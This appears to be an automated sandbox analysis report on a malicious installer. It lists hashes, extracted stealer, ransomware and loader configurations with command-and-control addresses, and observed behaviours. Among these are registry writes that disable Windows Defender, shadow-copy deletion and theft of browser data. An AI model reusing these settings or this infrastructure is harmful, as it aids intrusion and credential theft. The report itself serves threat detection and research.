Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
1521s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-08-2021 22:39
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
Setup (23).exe
Resource
win10v20210408
General
-
Target
Setup (14).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
redline
22.08
95.181.172.100:55640
Extracted
redline
1
37.0.8.88:44263
Extracted
redline
v1
195.2.78.163:25450
Extracted
vidar
40.1
937
https://eduarroma.tumblr.com/
-
profile_id
937
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
metasploit
windows/single_exec
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Glupteba Payload 1 IoCs
Processes:
resource yara_rule behavioral12/memory/2244-392-0x0000000004880000-0x00000000051A6000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5144 4856 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8148 4856 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8812 4856 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5968 4856 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7744 4856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10568 4856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 10708 4856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8704 4856 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5992 4856 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 12 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe family_redline C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe family_redline C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe family_redline behavioral12/memory/4840-281-0x000000000041A5EA-mapping.dmp family_redline behavioral12/memory/4860-283-0x000000000041A6E6-mapping.dmp family_redline behavioral12/memory/4860-279-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral12/memory/4840-277-0x0000000000400000-0x0000000000448000-memory.dmp family_redline behavioral12/memory/2560-273-0x0000000002250000-0x000000000226B000-memory.dmp family_redline behavioral12/memory/4964-406-0x000000000041A92A-mapping.dmp family_redline behavioral12/memory/4860-343-0x0000000004E10000-0x000000000530E000-memory.dmp family_redline behavioral12/memory/5048-310-0x000000000041A616-mapping.dmp family_redline C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3264 created 3740 3264 WerFault.exe o363rXjAh1T_ZmFhEFWs6Pzs.exe PID 5508 created 188 5508 WerFault.exe znjtUrbPv9Qu57ELNXIptXVT.exe PID 5380 created 2736 5380 WerFault.exe v_qlaPnF5evM3dXRBD0W35_I.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
svchost.exedescription pid process target process PID 8532 created 2244 8532 svchost.exe l1cwCpgwAuhvwCl0y4f21XUm.exe PID 8532 created 6384 8532 svchost.exe vg1a59kK32lVcmX2rJ7XCHeI.exe PID 8532 created 4420 8532 svchost.exe app.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral12/memory/2736-333-0x0000000000400000-0x0000000002402000-memory.dmp family_vidar behavioral12/memory/2736-362-0x00000000025D0000-0x000000000266D000-memory.dmp family_vidar -
Blocklisted process makes network request 64 IoCs
Processes:
MsiExec.exerundll32.exeRUNDLL32.EXEflow pid process 471 4152 MsiExec.exe 480 5824 rundll32.exe 482 4152 MsiExec.exe 488 4152 MsiExec.exe 492 4152 MsiExec.exe 494 4152 MsiExec.exe 519 4152 MsiExec.exe 521 4152 MsiExec.exe 525 9160 RUNDLL32.EXE 471 4152 MsiExec.exe 482 4152 MsiExec.exe 488 4152 MsiExec.exe 494 4152 MsiExec.exe 492 4152 MsiExec.exe 525 9160 RUNDLL32.EXE 534 9160 RUNDLL32.EXE 537 9160 RUNDLL32.EXE 540 9160 RUNDLL32.EXE 542 9160 RUNDLL32.EXE 543 9160 RUNDLL32.EXE 549 9160 RUNDLL32.EXE 551 9160 RUNDLL32.EXE 562 9160 RUNDLL32.EXE 564 9160 RUNDLL32.EXE 567 9160 RUNDLL32.EXE 571 9160 RUNDLL32.EXE 573 9160 RUNDLL32.EXE 574 9160 RUNDLL32.EXE 579 9160 RUNDLL32.EXE 581 9160 RUNDLL32.EXE 582 9160 RUNDLL32.EXE 583 9160 RUNDLL32.EXE 584 9160 RUNDLL32.EXE 585 9160 RUNDLL32.EXE 587 9160 RUNDLL32.EXE 588 9160 RUNDLL32.EXE 589 9160 RUNDLL32.EXE 591 9160 RUNDLL32.EXE 591 9160 RUNDLL32.EXE 594 9160 RUNDLL32.EXE 596 9160 RUNDLL32.EXE 597 9160 RUNDLL32.EXE 598 9160 RUNDLL32.EXE 601 9160 RUNDLL32.EXE 602 9160 RUNDLL32.EXE 602 9160 RUNDLL32.EXE 604 9160 RUNDLL32.EXE 605 9160 RUNDLL32.EXE 611 9160 RUNDLL32.EXE 612 9160 RUNDLL32.EXE 613 9160 RUNDLL32.EXE 619 9160 RUNDLL32.EXE 621 9160 RUNDLL32.EXE 622 9160 RUNDLL32.EXE 624 9160 RUNDLL32.EXE 626 9160 RUNDLL32.EXE 594 9160 RUNDLL32.EXE 628 9160 RUNDLL32.EXE 631 9160 RUNDLL32.EXE 632 9160 RUNDLL32.EXE 633 9160 RUNDLL32.EXE 634 9160 RUNDLL32.EXE 640 9160 RUNDLL32.EXE 641 9160 RUNDLL32.EXE -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
Processes:
3377047_logo_media.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe File opened for modification C:\Windows\System32\drivers\SET46DA.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET46DA.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
Processes:
SN9Sg_s51ftsNuuNGj7g1rAT.exe54axPUQyoM5gSmQFRergm7g2.exeb0v0M5P14IL6HfhwtR78DYMR.exeHqeTzHZdh1KyjcFp4aA13tvd.exelGWWBHm3E8UplgySvQwCR8t4.exeId0poKC1idN5W9bizinmQEVJ.exefeLA63PGCsTi4c1lWRXrz6Eb.exeSIyCPL9G7jyLe7jAVnTopx1c.exewHIP5ak8pb1tTUGxW5Yx1CBf.exeUQvCjtwlUUxmZrDhPkDuxaFf.exevsopyRXgZgkE9Zio6_CdCi1x.exeMmdyuBaUmiqTtz3iycBqc_Ne.exeo363rXjAh1T_ZmFhEFWs6Pzs.exeDXO_fwO41293rmBk4OLPHCT1.exel1cwCpgwAuhvwCl0y4f21XUm.exePtyHRWTqRy0UITBsMkTArf_R.exe2vjE50Tl27JNy_7vbQ35QdX4.exeN50FBt3JXHAi6GsYH83Yg0NO.exev_qlaPnF5evM3dXRBD0W35_I.exen3Xv5Z2LOb8T7SJHsSsOxLIZ.exeznjtUrbPv9Qu57ELNXIptXVT.exeed_7PPZS1byO0JAU7gy2jV_X.exe9B7tRXdltAWK8R6StzopAF6q.exeZ6X45YxttCTJi5IiQ4xPeFcp.exejooyu.exemd8_8eus.execustomer3.exejfiag3g_gg.exeypc_aYtRkVH5vN8Wjb4PcQIC.exeDXO_fwO41293rmBk4OLPHCT1.exe54axPUQyoM5gSmQFRergm7g2.exeUQvCjtwlUUxmZrDhPkDuxaFf.exeypc_aYtRkVH5vN8Wjb4PcQIC.tmp54axPUQyoM5gSmQFRergm7g2.exeMmdyuBaUmiqTtz3iycBqc_Ne.exe5751915.exe1264403.exe1543961.exe5504337.exe1630908.exe2vjE50Tl27JNy_7vbQ35QdX4.exe11111.exehBS_VbW.EXEWinHoster.exeSetup.exe11111.exejfiag3g_gg.exerunvd.exeInlog.exeCleaner Installation.exeWEATHER Manager.exeVPN.exeInlog.tmpaskinstall53.exeConhost.exeMediaBurner2.exeGmwMhItJIZQBqlqtfRfbgY_j.exeConhost.exezhaoy-game.exeLivelyScreenRecS1.9.exextect12.exeMediaBurner2.tmp11111.exezhaoy-game.exepid process 804 SN9Sg_s51ftsNuuNGj7g1rAT.exe 3744 54axPUQyoM5gSmQFRergm7g2.exe 1036 b0v0M5P14IL6HfhwtR78DYMR.exe 1672 HqeTzHZdh1KyjcFp4aA13tvd.exe 3460 lGWWBHm3E8UplgySvQwCR8t4.exe 2332 Id0poKC1idN5W9bizinmQEVJ.exe 2588 feLA63PGCsTi4c1lWRXrz6Eb.exe 2560 SIyCPL9G7jyLe7jAVnTopx1c.exe 2696 wHIP5ak8pb1tTUGxW5Yx1CBf.exe 2272 UQvCjtwlUUxmZrDhPkDuxaFf.exe 2716 vsopyRXgZgkE9Zio6_CdCi1x.exe 380 MmdyuBaUmiqTtz3iycBqc_Ne.exe 3740 o363rXjAh1T_ZmFhEFWs6Pzs.exe 3840 DXO_fwO41293rmBk4OLPHCT1.exe 2244 l1cwCpgwAuhvwCl0y4f21XUm.exe 2800 PtyHRWTqRy0UITBsMkTArf_R.exe 3316 2vjE50Tl27JNy_7vbQ35QdX4.exe 2108 N50FBt3JXHAi6GsYH83Yg0NO.exe 2736 v_qlaPnF5evM3dXRBD0W35_I.exe 3568 n3Xv5Z2LOb8T7SJHsSsOxLIZ.exe 188 znjtUrbPv9Qu57ELNXIptXVT.exe 2220 ed_7PPZS1byO0JAU7gy2jV_X.exe 3436 9B7tRXdltAWK8R6StzopAF6q.exe 1100 Z6X45YxttCTJi5IiQ4xPeFcp.exe 4252 jooyu.exe 4276 md8_8eus.exe 4316 customer3.exe 4732 jfiag3g_gg.exe 4952 ypc_aYtRkVH5vN8Wjb4PcQIC.exe 4840 DXO_fwO41293rmBk4OLPHCT1.exe 4892 54axPUQyoM5gSmQFRergm7g2.exe 4860 UQvCjtwlUUxmZrDhPkDuxaFf.exe 5088 ypc_aYtRkVH5vN8Wjb4PcQIC.tmp 5048 54axPUQyoM5gSmQFRergm7g2.exe 4688 MmdyuBaUmiqTtz3iycBqc_Ne.exe 4920 5751915.exe 3272 1264403.exe 300 1543961.exe 2056 5504337.exe 5028 1630908.exe 4964 2vjE50Tl27JNy_7vbQ35QdX4.exe 3844 11111.exe 4552 hBS_VbW.EXE 2712 WinHoster.exe 5180 Setup.exe 5220 11111.exe 5360 jfiag3g_gg.exe 5460 runvd.exe 5492 Inlog.exe 5540 Cleaner Installation.exe 5584 WEATHER Manager.exe 5680 VPN.exe 5696 Inlog.tmp 5708 askinstall53.exe 5740 Conhost.exe 5764 MediaBurner2.exe 5816 GmwMhItJIZQBqlqtfRfbgY_j.exe 5880 Conhost.exe 5892 zhaoy-game.exe 5952 LivelyScreenRecS1.9.exe 6008 xtect12.exe 6040 MediaBurner2.tmp 6112 11111.exe 6024 zhaoy-game.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
taskeng.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\LockCheckpoint.tiff taskeng.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
YjGkUXS79c6Yx83LaCcitF4i.exeEBPRzFXg8T9BBzxSv1xLJFze.exe5UGVE6RxDwIgDLlxhN_NPoX7.exeoMAHejMtAEYE1VopeG9aj0Fc.exeA5A9.exeapp.exePtyHRWTqRy0UITBsMkTArf_R.exeId0poKC1idN5W9bizinmQEVJ.exe7DEB.exe8B3A.exedllhost.exejeEY260TDbsX9nbKMwLGA5tW.exeHqeTzHZdh1KyjcFp4aA13tvd.exe725.exeZ6X45YxttCTJi5IiQ4xPeFcp.exe6B5C.exelGWWBHm3E8UplgySvQwCR8t4.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YjGkUXS79c6Yx83LaCcitF4i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EBPRzFXg8T9BBzxSv1xLJFze.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5UGVE6RxDwIgDLlxhN_NPoX7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YjGkUXS79c6Yx83LaCcitF4i.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oMAHejMtAEYE1VopeG9aj0Fc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion A5A9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion app.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PtyHRWTqRy0UITBsMkTArf_R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Id0poKC1idN5W9bizinmQEVJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7DEB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8B3A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion app.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jeEY260TDbsX9nbKMwLGA5tW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion HqeTzHZdh1KyjcFp4aA13tvd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HqeTzHZdh1KyjcFp4aA13tvd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5UGVE6RxDwIgDLlxhN_NPoX7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8B3A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 725.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oMAHejMtAEYE1VopeG9aj0Fc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Z6X45YxttCTJi5IiQ4xPeFcp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jeEY260TDbsX9nbKMwLGA5tW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Id0poKC1idN5W9bizinmQEVJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6B5C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion A5A9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 725.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lGWWBHm3E8UplgySvQwCR8t4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6B5C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PtyHRWTqRy0UITBsMkTArf_R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Z6X45YxttCTJi5IiQ4xPeFcp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EBPRzFXg8T9BBzxSv1xLJFze.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7DEB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lGWWBHm3E8UplgySvQwCR8t4.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Setup (14).exextect12.exeSarybifipi.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Setup (14).exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation xtect12.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Sarybifipi.exe Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation cmd.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
app.exedllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Wine app.exe Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Wine dllhost.exe -
Loads dropped DLL 64 IoCs
Processes:
SIyCPL9G7jyLe7jAVnTopx1c.exeypc_aYtRkVH5vN8Wjb4PcQIC.tmpCleaner Installation.exeInlog.tmpConhost.exeSN9Sg_s51ftsNuuNGj7g1rAT.exeConhost.exeMediaBurner2.tmprundll32.exerundll32.exeSetup.exeSetup.tmpSetup.tmplpfqOPuIJtcNciqgj3UVTK2o.exeRtOchpiStj2VNfCQPyk1aEP2.tmpMsiExec.exerundll32.exelY_jtOV2TW9e7n1ZnGcMZ4jD.exerundll32.exeMsiExec.exeMsiExec.exeGameBoxWin64.exeMsiExec.exeRUNDLL32.EXERUNDLL32.EXErundll32.exeConhost.exeRUNDLL32.EXErundll32.exeConhost.exepid process 2560 SIyCPL9G7jyLe7jAVnTopx1c.exe 5088 ypc_aYtRkVH5vN8Wjb4PcQIC.tmp 5088 ypc_aYtRkVH5vN8Wjb4PcQIC.tmp 5540 Cleaner Installation.exe 5696 Inlog.tmp 5696 Inlog.tmp 5740 Conhost.exe 5740 Conhost.exe 804 SN9Sg_s51ftsNuuNGj7g1rAT.exe 5880 Conhost.exe 5880 Conhost.exe 6040 MediaBurner2.tmp 5776 rundll32.exe 5824 rundll32.exe 804 SN9Sg_s51ftsNuuNGj7g1rAT.exe 804 SN9Sg_s51ftsNuuNGj7g1rAT.exe 6596 Setup.exe 7140 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 7156 Setup.tmp 6560 lpfqOPuIJtcNciqgj3UVTK2o.exe 5824 rundll32.exe 5824 rundll32.exe 1776 RtOchpiStj2VNfCQPyk1aEP2.tmp 1776 RtOchpiStj2VNfCQPyk1aEP2.tmp 7696 MsiExec.exe 8176 rundll32.exe 6352 lY_jtOV2TW9e7n1ZnGcMZ4jD.exe 7696 MsiExec.exe 6352 lY_jtOV2TW9e7n1ZnGcMZ4jD.exe 6352 lY_jtOV2TW9e7n1ZnGcMZ4jD.exe 5336 rundll32.exe 6868 MsiExec.exe 6868 MsiExec.exe 6868 MsiExec.exe 4152 MsiExec.exe 7644 GameBoxWin64.exe 7644 GameBoxWin64.exe 7644 GameBoxWin64.exe 8284 MsiExec.exe 4152 MsiExec.exe 4152 MsiExec.exe 8284 MsiExec.exe 4152 MsiExec.exe 4152 MsiExec.exe 4152 MsiExec.exe 9160 RUNDLL32.EXE 4152 MsiExec.exe 4152 MsiExec.exe 4152 MsiExec.exe 4152 MsiExec.exe 9256 RUNDLL32.EXE 10152 rundll32.exe 4176 Conhost.exe 2192 RUNDLL32.EXE 2192 RUNDLL32.EXE 5848 rundll32.exe 8660 Conhost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\lGWWBHm3E8UplgySvQwCR8t4.exe themida C:\Users\Admin\Documents\Id0poKC1idN5W9bizinmQEVJ.exe themida C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe themida C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe themida C:\Users\Admin\Documents\Z6X45YxttCTJi5IiQ4xPeFcp.exe themida C:\Users\Admin\Documents\PtyHRWTqRy0UITBsMkTArf_R.exe themida C:\Users\Admin\Documents\Z6X45YxttCTJi5IiQ4xPeFcp.exe themida behavioral12/memory/3460-236-0x0000000001360000-0x0000000001361000-memory.dmp themida behavioral12/memory/2800-237-0x0000000001360000-0x0000000001361000-memory.dmp themida behavioral12/memory/1100-252-0x00000000002D0000-0x00000000002D1000-memory.dmp themida behavioral12/memory/1672-253-0x0000000000E20000-0x0000000000E21000-memory.dmp themida C:\Users\Admin\Documents\Id0poKC1idN5W9bizinmQEVJ.exe themida C:\Users\Admin\Documents\HqeTzHZdh1KyjcFp4aA13tvd.exe themida C:\Users\Admin\Documents\lGWWBHm3E8UplgySvQwCR8t4.exe themida -
Processes:
DF29.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions DF29.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" DF29.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet DF29.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths DF29.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection DF29.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" DF29.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" DF29.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features DF29.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" DF29.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DF29.exe = "0" DF29.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
Processes:
